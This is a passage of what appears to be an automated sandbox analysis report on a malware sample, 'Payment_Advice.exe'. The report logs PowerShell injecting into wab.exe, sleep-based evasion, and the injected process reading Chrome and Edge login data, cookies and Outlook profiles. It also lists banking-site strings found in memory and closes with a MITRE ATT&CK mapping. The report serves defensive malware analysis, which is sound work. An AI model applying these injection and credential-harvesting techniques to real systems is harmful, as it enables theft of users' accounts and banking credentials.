            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -597875s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -597766s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -597641s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -597516s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -597406s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -597297s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -597186s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -597078s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -596969s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -596859s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -596750s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -596641s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -596516s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -596391s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -596281s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -596172s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -596062s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -595953s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -595844s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -595625s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -595515s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -595297s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -595187s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -595064s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -594937s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -594828s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -594718s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -594609s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260Thread sleep time: -594500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599872Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599764Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598766Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598641Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598094Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597875Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597766Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597641Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597516Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597297Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597186Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596969Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596750Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596641Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596516Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596391Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596172Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595844Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595064Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594937Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594828Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594718Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594500Jump to behavior
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3285513156.0000000005E1C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: wab.exe, 00000005.00000002.3285513156.0000000005E1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW+f
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: C:\Users\user\Desktop\Payment_Advice.exeAPI call chain: ExitProcess graph end nodegraph_0-3516
            Source: C:\Users\user\Desktop\Payment_Advice.exeAPI call chain: ExitProcess graph end nodegraph_0-3515
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04E577F9 LdrInitializeThunk,2_2_04E577F9
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3B50000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 28BFE68Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6752, type: MEMORYSTR
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000005.00000002.3299130843.0000000021787000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6752, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000002.3299130843.0000000021681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6752, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
